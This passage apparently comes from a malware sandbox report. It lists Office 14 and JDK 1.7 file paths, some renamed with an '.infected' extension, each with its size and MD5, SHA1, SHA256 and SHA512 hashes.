SHA1
6da634b6d503e92489dafed9dee159b3bccd4257

SHA256
1a7c5b79be33802a8ee57dbb4aa417a4bd1b3398810b0d24ccbdb42f95cc0b88

SHA512
e0b8180435ebf88588549ef2e212497cec1636357855c0d89f5a4009eceb9ce314ce40b73049e73c25fcda343d1c8cacc6e9495d0abde6846a1298f72cb739d4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

Filesize
1KB

MD5
dd307c7d4fd5b61f4e46b7e9f780fae2

SHA1
4c6397fa4f7f7be472fa293b3f0370f28ea653d8

SHA256
d7163a1960e49743b9d1eb1ee15a32a86e9a73d95451c65df3d341d41d0d583a

SHA512
9f455559de4f16a341b8e72395db0cc6986bb7ba487dc4591cb50ee9ac11c715230323e2b6d67bce45a168f4ca99349c786756f36566d67c3797b65ef669fc9a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
2bcfc9dbc6b6c3bfffbbe63a523a3b27

SHA1
3ba19d9a2ce346750b830b6c00c9e4e0af57a6a6

SHA256
c3016670d11f0de8a451f931ad27c107b742737e05138896ba050e76bfb5a3a6

SHA512
4868c740656efcb394237ef9e4d924ecf59d17ccfadeffd6679e29017e3953fb64dec5031be08ff042a2882cf2f67fc0fe79b0f357b2c96a596f08395bf4ec0a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF.infected

Filesize
1KB

MD5
0fd5f54b057d76145e01a1b15b0fe145

SHA1
cd1c66ea31badde05a7fbe7f5f17db02f8df536f

SHA256
1a5e0352cef9af331479197e766664751e07b820b223e2ce2c2ac9201cfd4b6b

SHA512
94551670d2c16dc2ef469b9b26164c22a2a40974b0e82d8287f844e5cc18ef467be90de5d89b010c7112e7ccaadf4bd4ef572f9d616273926917d42a3f220449

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL

Filesize
240KB

MD5
48333ecea9c37c8dfb617b70e14aa581

SHA1
ed5d174e02c79e5bbee7beb73def157ed6bd4893

SHA256
0537a3a8c58dcd534451b20e7411bee96e39b4956920e39f9c07e2fde1f5ed38

SHA512
62d39661227fcf38b0c5d57337da1789227c82ede0f45a72e6f071d62430ef98d0cb9915be73a2148417be0ebd6b63e775dd98db1951d40652e1ed922e8bd317

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_ON.GIF.infected

Filesize
1KB

MD5
769f5b308783a6ff3dc18f82bbf3833f

SHA1
f5c89793e735be6b38b6f96961df564be23ec36c

SHA256
f8baa31d314477d77fab96ffd1f8ef61c9151db2677b640574f8de1a19c3a360

SHA512
21800f89fb3f47dd845beaacceb13a07e7e1a3e38e8e168eb268f01a3838796ea1bdde5e802991234cf178c819b657fcb4a025db4fecbcc798d53cdaeec179df

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
dc19dfa79f0a282fd4a8115ad351de7d

SHA1
2334b1b98c8cd7f848e7c668e7ed50736f437823

SHA256
685771b5261cc3b8619a85007bdcd9e71c7e0dfa8f81360c179ec7b6382661fe

SHA512
8a5feec5707830a1d3ff1c97cc006193ac82621dfd847fb9a8a0af042ff5bec1803de2ba884a69e7dd83f69f79dc05f77c0bca9c5fc3db03fed556d0abed8620

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

Filesize
4KB

MD5
f7174e2c275f8e226ad69e1d9abee9f2

SHA1
41634ae9a709b06bbd27b89f0810fd8db0cb505c

SHA256
791a59c80f120d2c5e7c7da1eb7c0285307611921cbe3ef2fd8ada5f090570da

SHA512
b6d911d38beea0edd24c4dd872540f17bf18307d312ddf034800b9abcab5684ba8be736233500ef299aa890f8edd95f90d06cd5b740553b0d2518ea6c30f8359

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\BG_ADOBE.GIF

Filesize
25KB

MD5
327c3d50d7ee54006ddfd323ae7ded9a

SHA1
0e916beadc7ca45dfb835ad82d7d52474ea46135

SHA256
7df025f0896dab14f27b511a3aeefa517f3c22c123714cf99fdf00ab1d3fc8e8

SHA512
a8834a90e886242adb630cb20b997b2dd5c4990ddbddd9ac9e6897895b7a60800d8102fded2edc5c161aac75bddb7f8db70bdb8553d7e9ad0da6713617b59ec2

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.ICO

Filesize
1KB

MD5
70125d47ad9babfede4c298a17178192

SHA1
d408c28fe3dadebe409e0e410090b2deaf61208b

SHA256
58cae7054c8e230593295284ce34591d771228f25fe82cf2388de7badfd18f41

SHA512
10bd0e1afcff6d03d28c970efaf35830773621f8c7584521c4c0019e9e563b3a1c78e6c8a96e5ffc1bc0094dd88cef77f440847bd78083969bfb2e9d62b0200f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

Filesize
8KB

MD5
c175b7d99e839ebd71a119bf10701f69

SHA1
b626180ba06f2249b609e19a50a57c9c26e22b0b

SHA256
264d0fdeeebbdace902803fd0fbc94f8bed79fd5c3acb3a184378ba784697174

SHA512
0fa9cd3edf4f7145692e8350544f4f093511c5172779be0855ec09f82fdeb3ad68bd1a1e3baae2a0b5009cd6868f7f5406b523e1d5257cbf88569b20a1c30dbc

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\BUTTON.GIF

Filesize
1KB

MD5
200df5d5a32185b6e5ce981fe9b9443e

SHA1
52d488671a070cbab8715a25caeb5d694bf31314

SHA256
0ef7a6519d345d1e38fd2ec37187b7948977377a20e231381d505b6db4f11041

SHA512
17639476eb2029788143c0a24eae27ae7b2616a7f007343d9b053d384e26403d38d9c9585896f29c6eb4931979327f8461b6e02eee917f5391f060a0fc9e6649

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF

Filesize
2KB

MD5
6b55335d4ac942a27df248ef87d5a63d

SHA1
397ec418e909e32e447af35ea412fdcbe0fc4fd4

SHA256
243010956d23576b5c58250796bc70ea37fa19f2a35bbc3ad1eb97fc2a432bda

SHA512
dcacace461d6eee3d19389013400bb192bcc6430852680d93ec81d11bcacca04faf368e8abc4885d22b0f1d16d8266189d52fdab375676530f3399987af63bba

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF

Filesize
2KB

MD5
43588fbe38538b343932beaf86bcadfc

SHA1
c63dd9bcb8c2a67ecb448342f7faec3ff453edf0

SHA256
8c1af54b47ef0eca890d18847fd8ec680110ff3a0c3a5aff86b8c2988d768c0c

SHA512
6b44b5387dd2124f9fa4ac6e5f452385231a5f49b0cbb495a908271352f1ef67dc757b99cf089f703e257c098561d905e6aa78505ea84c4f2075d4eeb0fcd2a1

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.ICO

Filesize
1KB

MD5
c56e51584c3462f7f1f5468e97a9d09d

SHA1
996937c6462c36b2b21c09376a33cd3e28c1b885

SHA256
34ffaad09243e4d34d1539c87d83e1b531a1299a25e97a96a71ab8c8e7df4954

SHA512
7c1a00f740c211b6042e6c02f70ef5166f5389ca34c8e43262aee2562aca42abae0ab4527f3c6c1c8cdf7beac584acd628ab8a7ceaaca76129318138402aabf4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg

Filesize
4KB

MD5
f2553cfe6f0066924636f7c91b34d4bb

SHA1
58a8e0c28f0b88a07d2b672da3dfae589e2243c7

SHA256
a7bbdaaf8c47a76705c200257f65aded881656e1faa5b572b898f81978a7d903

SHA512
eb57451444122214e2dfb42fed2c885ad2434cbecc5b714df532de590e5c7ce06c407db551084bbba4a7827a7caaed2a1d98f24189c83244a650aa0ed25baf96

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif

Filesize
4KB

MD5
8fbe172406b28888ed66f44388c098c2

SHA1
4cc882e55fa341167d069431e30b408058179507

SHA256
2040087c77265e46be6693fbf922cc18f49ecb122e3f5c17642f9382eea9cec6

SHA512
54d59d878a5e75c6b14d75e9efa2dc98973c45ab83af5413cf2ce129d07be90de035e7c4eb14dfb9ffd153f34dbed4248058a1ff2e1c697315c24ee1dd17270e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Casual.gif

Filesize
7KB

MD5
f07588caa80ef2f1498f3d9bf91d4edb

SHA1
7280c3457520ee43fc5760f384355a4ede7ff3b6

SHA256
e9df3d827bdcd161024e9ecb3b68c6009c871fb9f013e4f86e03a87098f1f3a8

SHA512
0ea061e139d604f766638aa4c413070315a167070ae16f901655ab07795e119ce953ba9de780cd1399c062b321172111ed831ad74137471e476cdebd03da2639

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Country.gif

Filesize
32KB

MD5
0196685d74976e5e9f8f552a601d201c

SHA1
fb11ec2d4762318659fb75a45802878de99d487c

SHA256
f4aded838780930662d7a98759078b3f8f7e87e1828c34116b509da2f13e8d83

SHA512
f2cfa43e3a46569c7a5ff9df7857a09dd5849ff380abd24ad70d472af59a2e7dc3c9b8283b073c34ba496573c1b69e7b9ca05acdb9d386cf1ca911ef07f035a7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Earthy.gif

Filesize
6KB

MD5
4bc65ec9e225da8cc3de908cba797ccb

SHA1
36cd1501c10fe19dc3c6bf64f7615d76917eafd5

SHA256
59401fb16556372e6425f4defaba0daeb4fc8d28e9527feaf8ee0f76d757663e

SHA512
58b9c42adeb8803720a962abe868af4697d3d2fc8574c1b5dc20756efbf822ab25886d92035c044de48a6658c558a5920b42d65aa27d0649f75d850a0411a0a7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif

Filesize
21KB

MD5
77b727cc4b7a86df83194f98a41f833f

SHA1
6698fe153e96c98511ef3f7855969bc0c25ed16f

SHA256
97efdd5b8814bebfa0f366166da98833770d9a38917afe3300b0249c99f43149

SHA512
bee8c603ad9f5cdd131eaf7cd11b9b6dfade7f1c2a3bf866f05884525938196694b4b8239c5ccc4fe1cda40534a2256459cf7871c83bffd77db354d88a0e68ff

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_GreenTea.gif

Filesize
23KB

MD5
7cc0290ed2f54e196e0bc38705a68175

SHA1
dd786c8445b716acce9b61b0f79f2341d1783766

SHA256
3b4698b7d1a89badb7c3a876aed0f3312e92043c185d5f105b8e62814218fc6b

SHA512
92ee3de01fb804e4f6128755a3df739a0eb4dd782105efa6b63459c19f5a0197e8fef11c843521a797db5b031b687d61beb90d65ed7a7bf0e585ef29f19eb1dc

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif

Filesize
1KB

MD5
7675b54c06217c6a79e98c80481a7625

SHA1
98fea3358d8d4a155a85ca30dc3861dca66e0199

SHA256
447ca3c602e384ed89e9d5081a09890eb833d2b25ec7726d2a5c91ec0ef382a7

SHA512
645e1b3980e503bca96480c59227ecbd78f9e241687aa7ab07a69c4d2d5fc2fd7b9e9f82cb99988251ab523f0b81547a051953a9c9e3c49d50a574423ad79d80

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_LightSpirit.gif

Filesize
9KB

MD5
5474506917ac9bd6c8a33f39eee4fd4a

SHA1
a483ec3d818ec90bd61238b8d2bc2cfbaa4a505f

SHA256
547d39216abaa31d0a70c40915215a770bbe8590f16723ef293f9b895792f1f7

SHA512
77668f2e766049f37cda816fe9e14c3ab5bfd2a67c5a4151d5dcdc611346f288de5cad9a65855762ab96a408fbe6bea982682960df336f448fd5faca147d7364

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_OliveGreen.gif

Filesize
16KB

MD5
e6a9b3c09646e3013fb8d30cf6b89702

SHA1
0a1ea41e9499c11d663ad4897d598d387b699f92

SHA256
cfe0efa32e3300a3a2597f7a9a7265b1b2941096e226beea35082f578c9baa32

SHA512
48aad4dd451b1a63011feaf73472ee251ee58448380c342e25f155b0421f21f7159dd8113a8a8a0634a7920b99c75b4fe4ca2a132cee1b86b9173e3c1db0af7d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Premium.gif

Filesize
7KB

MD5
68d5d4a3cda983f3e2146c3511f3e9fc

SHA1
92811a50defdc95b225e8c1e78cd647324f631a7

SHA256
8ea9a18271c3090a13637ea034ef49bdf8060a6b9315368a2d56a493264fd86d

SHA512
41f395d1be454a09a9a75de27f35a71b909ed6ce298110199ceff26c726c553b966d6b3aad2d70fda586a4f1dd818fb201f92bd68eb7faa8c0d7698708be38b0

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif.infected

Filesize
21KB

MD5
18a538450651f3af8e63e8fb3fe6342b

SHA1
9337d96f5c721f3b69c85780e30a353aed55cc30

SHA256
91c188f04e37746bceb7e553959acf23a7cdad0c1bd3f285171f640d65a2383b

SHA512
24725fac1aea3dc7250eefb7c9f2c516b44e92b3e9bbd51b6eef804ce45c69b6c3118343456bbaa1d8ac8962e661e24d34512c8c2c683175ae5e8d1ca96676f1

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_TexturedBlue.gif

Filesize
7KB

MD5
621e94553574b1e094bc3ad526669c16

SHA1
fbf792f4cb28eb5fe1d7e9de2851003266d5fed6

SHA256
76d727e0b6aefb511c1fc2775afee5516a7229556b4e8959e2526ac1345ef436

SHA512
1e3c1575c52dbfeb05a0958ee8950752535dcd1b1420a3bce196e971101b9b9df25243ab035e4a9a161df0131b62091724beba54ccf9dda4e213b0a2b57d8faa

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_VelvetRose.gif

Filesize
16KB

MD5
2e5a43945904bfc0e608f23ed0b66445

SHA1
a69c2397b500ff091a8653b34096e7843082579c

SHA256
dfab0a00b484b775ab3ff23665a747aca5a11e521d4e5b9e5ee28729c72ac788

SHA512
d785f793ff305026db354207778c69d2168d532ca555ea3642927125360529007304026bb1c8023f9c880f8113a9e59fbd519afcc9a39888cea5bcf102706d59

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF

Filesize
2KB

MD5
484ef33c433eb9f9f0a055d6093c93ca

SHA1
78b5ffd0f867cc048af5e0093afcf1292ced0ea1

SHA256
b1ce886f802ec608b0dc4c4b71d94b2e7c08a6b2b76fb239d6aedcfba015199e

SHA512
7f5583c5b2d7a84db75234ddad72abfd400bc1ae152fae37db594d227e3ba48cca2fe2b735b633fe5a72cd4830817187a19e791d98447ceeeb030840cab935e4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF.infected

Filesize
2KB

MD5
932d08e1d5554f59372fe03033444ce7

SHA1
b76d70a34dc9908f26c12000c4b6961fe6d094da

SHA256
3d08a6ad0432088442ee6da4ca8fa5dc4b9a1a256a7b3114a5f10196145f960a

SHA512
5e1a9e74c55ac60f84896d4a72097ca6e4c96732b1da056c88f8b13e1ad1df3b5b739d531f581198f90bc8074a9301f2d894a4174dd82b16f62d9122c816b16f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF

Filesize
2KB

MD5
0577262c1fc488f430037d30d9b32f5d

SHA1
b7633f1931833a7ce77f28f6b013b1f37085fcf0

SHA256
19440656b972d012fde7070418a1afeaceea6b855f4e9406e0a412a6f2da7fce

SHA512
cf0145bf30b596bea108511d050af203b7ceeaf29860b82eac66fd6b9b346766454933fecbc366be5ac65891c00baf59f726b40d853c6171e58f809e6fc1dc9e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF

Filesize
2KB

MD5
d60903935a960825e8473051d93d1cfe

SHA1
597d15c13fef22ac957d3ee7ef1abc1b18c9f719

SHA256
e2937466511ac0b6afff7920757fdd1065e98d15e824d578784b0582cfe977c6

SHA512
0de7ddc89ccce25c96d7396fad79c688b6b6513b8078cbfefce4e7bd7b9278f0babd7a9f217688f62cb0d0d98500be6e0bed993108e791797fa635749d1cd2b7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg

Filesize
6KB

MD5
9e02d9f77d72f4408122d3b7565e64c8

SHA1
659d7871b7de3cc5682c832e6ecce22b9d4cdd92

SHA256
fff0d1fbf8fa9397df634af311d6109151883ccaf1ec5d9b6ca156af6c6c3cc5

SHA512
17890f17eafacd4db480ea94bd3fe1a27c5f2aff871bb8120e844662b4c61e86181065978378dd64728b3f5e0071669b36bee11618e7469ce0550789b71880c4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

Filesize
2KB

MD5
a2cca197b132f0ad8c404e9b7df44421

SHA1
406b64963debd7c8ac4c36f666d1622cf894d4c9

SHA256
4e0e2e625a893e4f2c8defed2abb24ceb100fc1c65298ab0b084e932e7c72e46

SHA512
308b103e0c1ac74d178ca06c72beb7e7023ef9daa8d9e92c9fb5de58d89c3cac06003327e8d00c24eab31f521d108aa6c4a36918ebd8f2f0e028d07016c220a6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

Filesize
2KB

MD5
48768313b896609afce01db3221aed4b

SHA1
86a33c652f46547eb859b1d851a1ac18aa243de2

SHA256
49457caccbce475d521b49902cfddbe8b0da3c536a3ca7ae8e33fef68dc73deb

SHA512
17f8ce1791b11132c4bbc5cb43bac87722612a12ba9b966e804c8e8f3226e94e02f22b0c319d956cc420fa51bce7b96c2f70815d02bef4a44ec93fb4b45eef51

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif

Filesize
2KB

MD5
1b7861a902d5c937a8ad018b85a866c4

SHA1
b997cc6bf4da49c03d602851ef59a5c8e0bb7920

SHA256
aee762312893d4c12b52af1a23c09cea03ee4d60c41d53d3da7432ab0156370a

SHA512
9e612ed7f326fa7f8d7b8bdca46ab1a2377d58bcfafbf86c30ae98a864f36d71eb06b3924e2e2fe0e20614705c4cda7b7c0020a26b27aeb72798dea82a8c8139

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif

Filesize
2KB

MD5
c015cfd33d98ae2cf05fe1cef6570147

SHA1
e34dac67d0335dfecf5da580579df688fd7bc2e3

SHA256
c4059b24b44aba5bc7578e382cd035c4dbccc015af6530ce3cf8ffd66c81533f

SHA512
e24e456139c635113f0d2416c4dfa26d1121a6fe950598d5b00dc4081fc58e3934c078cc628cf298debab9e192dbab0facecbf55f0f74e9ab9c8fbbd6148f42b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif

Filesize
2KB

MD5
aab9b8226834164c092c56beb868c26f

SHA1
083f8f826773ba784e5f497bf3f6ddec9571bf7a

SHA256
73f4a5d9740d52b7ae819496458d0e5c67abcc507da92f2a274a70a8b113eaa8

SHA512
2a898b74eccaabdf3e245e9eefadd1fdaca11d83e91fdd0e5af26472f34f82ac1743e9d914a39c8dc5c49a2bf29e18c20fa01d7b3fb6e3a41d9c4ba12a13c398

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif

Filesize
2KB

MD5
21caad14425b54ac620babef34dfcc0d

SHA1
b96d1107e482fe28903427c50c767f8ff8f44414

SHA256
20be8a4b68d3aedbd1cb74d46ff6e72508442ae576e53ec760be48c2763ff12b

SHA512
d635a2d25670b352aaf575eb1290aaf57605a04c3faf6310a9aec6f6de2be2434275787bea2b87f80811f95034ec8cb496bb2b657728534b9e902c53d2c31e57

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif

Filesize
2KB

MD5
80be93f1506853ef0fa2970711dc5f28

SHA1
8017d39a043d5c8d662e22877ea9e8b4df5c4271

SHA256
ac9acc39316145509abf167ccb8c7de7ea51e9de45fd6996dcbcfdf5369e9947

SHA512
c7c4d5ec85f5b25875933bc8d2c8054ba91bd4142837852afa45ce60e8463994419a70cb99d58d5aca857503d0b4a2826765fa3c08c24c9937cf1a39f388344c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif

Filesize
2KB

MD5
19d2d4d5d9fcf40063df9df03895f060

SHA1
743b1f585d9be4d3d66a0c8e571005958c9177ea

SHA256
7ba1eb2d6a2db2e604c8a862ba7c689d65204143fcd5139b13edaa8333a124d1

SHA512
6a1d634fa615316a1f8cb7154dbe2dcf15ee7914595c99388356d6e9fde8dfdcc5e3dfa3e6056a5d2c81798db5805eb884307dad6d202f25533c376c57a417bb

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif

Filesize
2KB

MD5
c3df3aad912d5462d3b0b2234353cc94

SHA1
a983ad1edf8e30aa846da9ab974b6bc43e55edd7

SHA256
1bfe7de46c4800d2511a1c326bc79b3143064f99527cecb5d0b66cf353d28366

SHA512
39aea9facfe5ab605a3187f028ba21c4963b7740f01b82d08532b7db10285775173d8be06815c8dd7b7ba1abe0241d2a89eb9f28bc8d99c30b7c93da8b2fedb0

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml

Filesize
248KB

MD5
45398502a9f6f2e556a81a3bc82eb455

SHA1
821760476930e00bf18fa0cb193d24b84ac70f6e

SHA256
34cae108778fb6183dd32ac5b031d11b380e2e5d66152a61c4c8f207b753b09f

SHA512
be7bbf27e814819d3107b8f2f56600213ba1d32ed1c024011b5c8c589c8654e61819c20c5a3ce77979b32605199abcc90c982fc3e0ff84d490c2a69392b99d60

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\TALK21.COM.XML

Filesize
2KB

MD5
a545da3526707007d3730840d506b76c

SHA1
c43a3ceaab9ec15689eca1e4471d2dd208d1cea9

SHA256
813049e29b13b8a6361dbfd28307b7c5877abdea409dc3ba7642e1ae43a5ff3a

SHA512
7db9dc20a10057371325411ea40100826bdbe3a04cc6c91e551a7a888385e492b1fe3c9db60f52e367f7e2ef7e9c475c20982db3255bc894bea1ef1fbebc4122

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML

Filesize
2KB

MD5
72cc576856703d74aa18ba0c93ba73d2

SHA1
f00ca1121aed3d13706bcd416e694b8241aa4c20

SHA256
a3cc85e5c88892ac5390a5f47b573a97b76259d7a9fe680bc80a365566954028

SHA512
542a97b6c409096ad61255f25b22e7cd454d14795bb35bf4cfb550319717dde013852d39c65ba2ad8f068f83c319a61a7411f07a93dddd23379af196992f99b1

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl

Filesize
7KB

MD5
ff9cff4e26edc30369ff7ce12139f447

SHA1
c086efef7e0dd547c7dc5d55880b5c465e5906ad

SHA256
8fdb57785ae79c64cf8092e6674429342fd899737818e068a66286eaaf9efc4c

SHA512
b77d58fc0198c633222a7cd05a6b00e43e159de4181163a3aba9f8ab68044f30472c8ae41b6dc0e99c583f6383573fbe321cdbedd14dd8c5637dc4c130663d96

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif

Filesize
1KB

MD5
55d19a3d1453f4423bbf707d73e2548a

SHA1
3a260a14105413c24e1a684ecaecfafae871c017

SHA256
2d35c0e59bf28908ca2bf755da8d544665e73a3b855e88b50bda0f1cb4047435

SHA512
fe9fd9bf7afba038fb285712f5d1009654f9d2fb580141ed1bbd7d72f318dda6cc1f794b181c78ce10c096a26841bd4a95efe4b3067655772649f56a41b89b8a

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC

Filesize
1KB

MD5
25552e5319259e34f7671d90fe00ae10

SHA1
41daf2229f76716597d51b526d19ed091f45bd89

SHA256
ab8251355ce84afa9ad40a5fd5f22ea7ccbccca8f61823a82e29c07176f8b6e9

SHA512
8b2211257701f35b0eb63cf5743f3fe5c31d88b2a7fe2986df8e7c03e4d7c690e1b48e9d50411bd8912c4939cefbdad2ee31431cc53deeb862366b0ad2966efc

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5

Filesize
1KB

MD5
0b798faf405a8cf58a8d10872bbef58a

SHA1
fff0299b30c85b6e30af89d72704016e6bdb4cdb

SHA256
fa269b8c21150f8ab8cac53d86a8d2da06e6abc79d04599acb7ee52c8bb0de5c

SHA512
d27e85bc7aa929f5aedd907dc32250c0de9f498a875d9d98b8fa2469a0cf08f8497913740cd79a81efa52c45729f22cb56aab7d4cba1c5443a4b1c599f612061

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10

Filesize
1KB

MD5
27dade11754f580cc69cd88f757e3679

SHA1
f08ca21fe0a1da2804e14cb63e0e40c9f5218971

SHA256
4d80ea3edb09949abeb48cfbbb6ca24e4181d8310b258596a0672d9800a9b97b

SHA512
3d16c519885a295ee0145501ecf897b04b8539554b812aac5f8ec72cf0e4aa680ef6bbdc705209b2fb5a601ece8410f0b581e7c5e605d21d584504aa6914693a

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7

Filesize
1KB

MD5
2cc723f3037c81051e0336b84e7e4971

SHA1
17da55357757d8804324f766fb446bf051b73f2e

SHA256
45f686097affd721e14154990af7c9c972e32d90de5fd3eac9ba50f3574b177d

SHA512
811783adb3fe10d77edeeccfc84e82b476bdb2410bfc1c2ac4df0bff04cc68729e9ab1a063138540ef0fb1078ab5ce6fd2d554695dc1b603d6c7004dc7efae2d

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

Filesize
13KB

MD5
3a9cbe6294512e0813ea72b0d80171bb

SHA1
32d7629272baf62cf830ed9b0256eca0ae71200d

SHA256
a68bfed0e712190107371a86b8d5e0a3a3e8d522df9ac3cc4976a8ac872d40f4

SHA512
2eea6496a791fb776f47b8ae7945eeb8b226109930939550e241acfcdfb2219e133ebfe6332fae5cb2b54d9b2f76e9d7f9a0090e2b5a81f33ec410cda432b81b

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

Filesize
10KB

MD5
0aba8ee76bf146b9824e5724868874f2

SHA1
82a55d30ac89ce3ffb27dfff41f034d763d202e5

SHA256
ddc9b2b090a9a3f69b8de62e0d92d2cf53d95d4e28a1d9a11efcc773014103c2

SHA512
8e31f60413c851087c19f035a7994c065781f7df02e107589ac84d56c788afa2da3a44862062124726ec0d193041b2a0051f1e740d9aa88417e38b1e9ca926fa

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf

Filesize
1KB

MD5
9c03f25897b2876013451ac879180348

SHA1
d3c180300ac3c19e79ba6124be7b68beae489de6

SHA256
c0e638f2ec3f6994251a6c5c101e426f369a4e7077b6b0645c52d1e5c1a242ab

SHA512
b74ba35a43194f7f28683a282d5b048d0b510c5267f312dae4a2d02cc35375f86745a6c935a5b0daf55787d0ea0f4cc4439e6d361660d4dbd78714aa2bba059c

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
497ce176f19c86cae10edca9dc919baf

SHA1
0eafc1367c8653b0837b9f32c88022417435aadd

SHA256
0b6b9c6618ebeb600ac6a144af7a3c6bfefdbaf82ed1606ea924b226517272e6

SHA512
3f8605d7d1c3076e7b4a48272ea89298017f0efe683fa12de1be01a1194b9b8b49a0316dec378ba535f03b0e463823043cb938d89233f9737a61ffc89d5a0061

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

Filesize
12KB

MD5
